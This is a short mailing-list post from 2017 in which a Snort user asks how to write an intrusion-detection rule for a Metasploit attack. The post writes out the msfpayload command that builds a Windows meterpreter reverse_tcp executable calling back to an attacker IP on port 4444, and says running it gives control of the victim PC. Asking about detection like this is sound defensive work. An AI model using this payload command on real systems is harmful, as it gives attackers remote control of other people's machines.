[Snort-users] how to write rule for msfpayload in linux

nguyen cao nguyenblack1995 at gmail.com
Sat Nov 18 20:31:26 EST 2017

On the attacker I use: msfpayload windows/meterpreter/reverse_tcp
LHOST=(IP_attacker)​
 msfpayload2
<https://drive.google.com/file/d/10MzIeyeThWHMfuhNyDJTuG3Y4QJ_qjcA/view?usp=drive_web>
​ LPORT=4444 X > /root/Desktop/payload.exe ( in order to create file
payload.exe).
When I run file payload.exe on PC victim , I will take control system of
victim. I run wireshark and match packet but I do not know where to start
in order to write rule for type this attack